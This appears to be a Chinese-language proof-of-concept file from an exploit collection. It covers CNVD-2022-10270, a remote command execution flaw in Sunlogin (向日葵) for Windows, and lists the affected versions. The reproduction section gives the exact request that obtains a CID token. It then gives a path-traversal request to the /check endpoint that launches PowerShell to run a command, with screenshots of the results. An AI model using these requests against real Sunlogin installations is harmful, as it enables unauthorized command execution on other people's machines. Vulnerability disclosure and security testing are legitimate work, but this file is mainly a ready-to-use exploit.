POC/wpoc/向日葵/向日葵远程代码执行漏洞(CNVD-2022-10270).md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

34 lines
1.2 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 向日葵远程代码执行漏洞CNVD-2022-10270
## 漏洞描述
向日葵通过发送特定的请求获取CID后可调用 check接口实现远程命令执行导致服务器权限被获取。
## 影响版本
+ 向日葵个人版 for Windows <=11.0.0.33162版本
+ 向日葵简约版 <= V1.0.1.433152021.12
## 漏洞复现
向日葵开启后会默认在`4000-65535`之间开启某个端口
![1679820583875-6d7b4e9b-5387-4cf5-a2e6-88ddcde3bacd.png](./img/gUlc0BSsVT6Iv0WU/1679820583875-6d7b4e9b-5387-4cf5-a2e6-88ddcde3bacd-830006.png)
发送请求获取CID
```java
/cgi-bin/rpc?action=verify-haras
```
![1679820640646-5c60754e-fc3f-407f-9f0f-882daffc1ac8.png](./img/gUlc0BSsVT6Iv0WU/1679820640646-5c60754e-fc3f-407f-9f0f-882daffc1ac8-757223.png)
使用获取到的 verify_string 作为 cookie的 CID字段进行命令执行
```java
/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+ipconfig
```
![1679820683541-36b5acf8-87ff-466c-aa76-1b3ea94f802c.png](./img/gUlc0BSsVT6Iv0WU/1679820683541-36b5acf8-87ff-466c-aa76-1b3ea94f802c-023495.png)
> 更新: 2024-02-29 23:58:31
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/re22tknn48ckod6v>